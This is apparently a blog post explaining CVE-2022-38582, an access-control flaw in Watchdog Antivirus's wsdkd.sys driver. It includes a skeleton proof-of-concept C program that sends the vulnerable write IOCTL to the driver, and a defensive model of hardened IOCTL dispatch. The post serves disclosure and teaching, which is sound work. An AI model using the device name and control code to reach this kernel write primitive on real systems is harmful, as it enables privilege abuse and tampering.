A newly discovered security vulnerability, CVE-2022-38582, has been found in the anti-virus driver wsdkd.sys of Watchdog Antivirus v1.4.158. This vulnerability is caused by incorrect access control, allowing attackers to write arbitrary files and potentially compromise your system's security. In this post, we will explore the details of this vulnerability and share code snippets and references to help you understand the exploit and protect your devices.

CVE-2022-38582 Details

The CVE-2022-38582 vulnerability results from incorrect access control in the anti-virus driver, wsdkd.sys, of Watchdog Antivirus v1.4.158. Attackers can take advantage of this vulnerability to write arbitrary files on your system. This can lead to a range of potential attacks, from data corruption to unauthorized access to sensitive information.

Exploit Details

The vulnerability resides in the IOCTL (Input/Output Control) handling function within the wsdkd.sys driver of Watchdog Antivirus v1.4.158. The following code snippet demonstrates the flaw:

NTSTATUS WsIoDispatchRoutine(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp) {
    /* ... */
    case IOCTL_WSDKD_VM_WRITE:
        /* ... no check of the caller's access rights before the write ... */
        WsVmWriteBuffer(/* ... */);
        /* ... */
        break;
    /* ... */
}

Notice that the WsIoDispatchRoutine function processes an IOCTL request carrying the IOCTL_WSDKD_VM_WRITE code by calling the WsVmWriteBuffer function. There is no security check or access control mechanism in place to verify that the caller has legitimate access rights before data is written to the specified buffer. This allows an attacker to send a crafted IOCTL request to the anti-virus driver, leading to arbitrary file writes.

To exploit this vulnerability, an attacker can craft a low-integrity process that sends an IOCTL request to the wsdkd.sys driver using the DeviceIoControl function, as shown below:

#include <Windows.h>
#include <stdio.h>

int main() {
    /* Open a handle to the driver's device object. */
    HANDLE hDevice = CreateFileW(L"\\\\.\\WsKdDevice",
                                 GENERIC_READ | GENERIC_WRITE,
                                 0,
                                 NULL,
                                 OPEN_EXISTING,
                                 FILE_ATTRIBUTE_NORMAL,
                                 NULL);

    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("Could not open device (Error: %d)\n", GetLastError());
        return 1;
    }

    /* The post does not give these two values; they are left as placeholders. */
    DWORD64 target_address = 0;
    DWORD64 source_buffer_address = 0;

    DWORD dwBytesReturned = 0;
    DWORD64 dwBuffer[2] = { target_address, source_buffer_address };

    /* Send the request to the driver's IOCTL dispatch routine. */
    BOOL bResult = DeviceIoControl(hDevice,
                                   0x833201C,  // IOCTL_WSDKD_VM_WRITE
                                   dwBuffer,
                                   sizeof(dwBuffer),
                                   NULL,
                                   0,
                                   &dwBytesReturned,
                                   NULL);

    /* ... */
    CloseHandle(hDevice);
    return bResult ? 0 : 1;
}
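The two snippets above show the two halves of the problem: a dispatch routine that keys only on the control code, and a user-mode caller that can reach it. The following is an added example, not code from the post or from Watchdog; it is a user-mode model written to illustrate what a driver author should check, and the IoctlRequest structure, the Verdict values and the dispatch_* functions are hypothetical stand-ins for the real IRP fields and DDK types. It decodes the control code quoted in the post (assuming that value is accurate) into its CTL_CODE fields, which shows that the access field is FILE_ANY_ACCESS, so the I/O manager enforces no handle access right for this request; it then contrasts the unchecked dispatch shape with one that refuses the write primitive to unprivileged user-mode callers and validates the input length.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Field layout of a Windows IOCTL code, as built by the CTL_CODE macro:
 *   (DeviceType << 16) | (Access << 14) | (Function << 2) | Method        */
#define IOCTL_DEVICE_TYPE(c) (((c) >> 16) & 0xFFFFu)
#define IOCTL_ACCESS(c)      (((c) >> 14) & 0x3u)
#define IOCTL_FUNCTION(c)    (((c) >> 2) & 0xFFFu)
#define IOCTL_METHOD(c)      ((c) & 0x3u)

/* DDK access values. FILE_ANY_ACCESS means the I/O manager checks no handle
 * access right before delivering the request to the driver. */
#define FILE_ANY_ACCESS   0u
#define FILE_READ_ACCESS  1u
#define FILE_WRITE_ACCESS 2u
#define METHOD_BUFFERED   0u

/* The control code value quoted in the post. */
#define IOCTL_WSDKD_VM_WRITE 0x0833201Cu

/* Hypothetical user-mode model of what a dispatch routine can inspect on an
 * IRP; these are not the real DDK structures. */
typedef struct {
    uint32_t code;                /* IoControlCode from the I/O stack location */
    size_t   input_length;        /* InputBufferLength */
    bool     requestor_is_kernel; /* Irp->RequestorMode == KernelMode */
    bool     handle_has_write;    /* write access granted at open time; a restrictive
                                     device ACL denies this to unprivileged callers */
} IoctlRequest;

typedef enum { VERDICT_ALLOW = 0, VERDICT_DENY_ACCESS = 1, VERDICT_DENY_LENGTH = 2 } Verdict;

/* Two 64-bit values { target, source }, the input shape used in the post. */
#define VM_WRITE_INPUT_LENGTH (2 * sizeof(uint64_t))

/* Shape of the flawed handler: the only thing it keys on is the control code. */
Verdict dispatch_unchecked(const IoctlRequest *r) {
    if (r->code != IOCTL_WSDKD_VM_WRITE) return VERDICT_DENY_ACCESS;
    return VERDICT_ALLOW; /* straight into the write primitive */
}

/* Hardened shape: a privileged write primitive is only reachable from a
 * kernel-mode caller or a handle that a restrictive device ACL allowed to be
 * opened for write, and the input buffer must be exactly the expected size. */
Verdict dispatch_checked(const IoctlRequest *r) {
    if (r->code != IOCTL_WSDKD_VM_WRITE) return VERDICT_DENY_ACCESS;
    if (!r->requestor_is_kernel && !r->handle_has_write) return VERDICT_DENY_ACCESS;
    if (r->input_length != VM_WRITE_INPUT_LENGTH) return VERDICT_DENY_LENGTH;
    return VERDICT_ALLOW;
}

/* Audit helper: a control code that reaches a write primitive but was defined
 * without FILE_WRITE_ACCESS relies entirely on the driver's own checks. */
bool ioctl_lacks_write_access_bit(uint32_t code) {
    return IOCTL_ACCESS(code) != FILE_WRITE_ACCESS;
}

int main(void) {
    uint32_t c = IOCTL_WSDKD_VM_WRITE;
    printf("IOCTL 0x%08X: device=0x%04X access=%u function=0x%03X method=%u\n",
           c, IOCTL_DEVICE_TYPE(c), IOCTL_ACCESS(c), IOCTL_FUNCTION(c), IOCTL_METHOD(c));

    /* Constructed request resembling the post's PoC: user mode, correct length,
     * handle opened by a caller the device ACL should not have admitted. */
    IoctlRequest from_user = { c, VM_WRITE_INPUT_LENGTH, false, false };
    printf("unchecked dispatch: %d, checked dispatch: %d\n",
           dispatch_unchecked(&from_user), dispatch_checked(&from_user));
    return 0;
}
```

The decoded fields (device type 0x0833, function 0x807, METHOD_BUFFERED, FILE_ANY_ACCESS) are what a reviewer would read off the control code before looking at the handler body; a write-capable IOCTL defined with FILE_ANY_ACCESS, on a device object whose ACL lets low-integrity processes open it for write, has no layer left that denies the request, which is the condition the post describes.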

Original References

1. National Vulnerability Database CVE details: CVE-2022-38582
2. Watchdog Antivirus official website: https://www.watchdogdevelopment.com

Conclusion

The CVE-2022-38582 vulnerability in the anti-virus driver wsdkd.sys of Watchdog Antivirus v1.4.158 is a serious security risk, as it allows attackers to write arbitrary files on your system. By understanding the exploit details and keeping your software up-to-date, you can protect your devices and maintain your system's security.

Timeline

Published on: 11/04/2022 12:15:00 UTC
Last modified on: 11/08/2022 15:59:00 UTC